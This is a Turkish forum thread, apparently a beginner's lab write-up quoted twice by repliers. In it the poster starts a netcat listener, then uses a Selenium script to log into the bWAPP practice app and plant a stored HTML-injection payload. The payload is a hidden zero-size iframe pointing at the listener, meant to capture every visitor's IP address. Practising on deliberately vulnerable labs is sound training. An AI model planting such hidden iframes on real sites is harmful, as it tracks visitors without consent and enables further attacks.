ilk exploitim

oncelikle​

nc -nvlp 8080​

komutunu yazdım ve 8080 portunu dinlemeye aldım​

​

yukarıdaki kod ile bwapp'e giris yaptım ardından "html injection stored blog" bolumune giriş yapıp oradaki kutucuğa :​

<iframe src=http://10.0.2.9:8080 height='0' width='0'</iframe>​

kodunu yazdım bu kod siteye giren herkesin ip adresini bana verecek ​

yuathay' Alıntı:

oncelikle​

nc -nvlp 8080​

komutunu yazdım ve 8080 portunu dinlemeye aldım​

from selenium import webdriver
from selenium.webdriver.common.by import By

browser=webdriver.Firefox()
browser.get("http://10.0.2.4/bWAPP")
browser.find_element(By.XPATH,"//*[@id='login']").send_keys('bee')
browser.find_element(By.XPATH,"//*[@id='password']").send_keys('bug')
browser.find_element(By.XPATH,"/html/body/div[2]/form/button").click()
browser.find_element(By.XPATH,"/html/body/div[8]/form/select").click()
browser.find_element(By.XPATH,"/html/body/div[8]/form/select/option[6]").click()
browser.find_element(By.XPATH,"/html/body/div[8]/form/button").click()
metin = browser.find_element(By.XPATH,"//*[@id='entry']")
metin.send_keys("<iframe src=http://10.0.2.9:8080 height='0' width='0'</iframe>")
düğme = browser.find_element(By.XPATH,"/html/body/div[2]/form/table/tbody/tr[2]/td[1]/button")
düğme.click()

​

yukarıdaki kod ile bwapp'e giris yaptım ardından "html injection stored blog" bolumune giriş yapıp oradaki kutucuğa :​

<iframe src=http://10.0.2.9:8080 height='0' width='0'</iframe>​

kodunu yazdım bu kod siteye giren herkesin ip adresini bana verecek ​

Genişletmek için tıkla ...

yuathay' Alıntı:

oncelikle​

nc -nvlp 8080​

komutunu yazdım ve 8080 portunu dinlemeye aldım​

from selenium import webdriver
from selenium.webdriver.common.by import By

browser=webdriver.Firefox()
browser.get("http://10.0.2.4/bWAPP")
browser.find_element(By.XPATH,"//*[@id='login']").send_keys('bee')
browser.find_element(By.XPATH,"//*[@id='password']").send_keys('bug')
browser.find_element(By.XPATH,"/html/body/div[2]/form/button").click()
browser.find_element(By.XPATH,"/html/body/div[8]/form/select").click()
browser.find_element(By.XPATH,"/html/body/div[8]/form/select/option[6]").click()
browser.find_element(By.XPATH,"/html/body/div[8]/form/button").click()
metin = browser.find_element(By.XPATH,"//*[@id='entry']")
metin.send_keys("<iframe src=http://10.0.2.9:8080 height='0' width='0'</iframe>")
düğme = browser.find_element(By.XPATH,"/html/body/div[2]/form/table/tbody/tr[2]/td[1]/button")
düğme.click()

​

yukarıdaki kod ile bwapp'e giris yaptım ardından "html injection stored blog" bolumune giriş yapıp oradaki kutucuğa :​

<iframe src=http://10.0.2.9:8080 height='0' width='0'</iframe>​

kodunu yazdım bu kod siteye giren herkesin ip adresini bana verecek ​

Genişletmek için tıkla ...

powwerbangTR' Alıntı:

Eline sağlık honeypod araştırması yaparsan daha ileri seviyeye geçeceğine inanıyorum başarılar.

Genişletmek için tıkla ...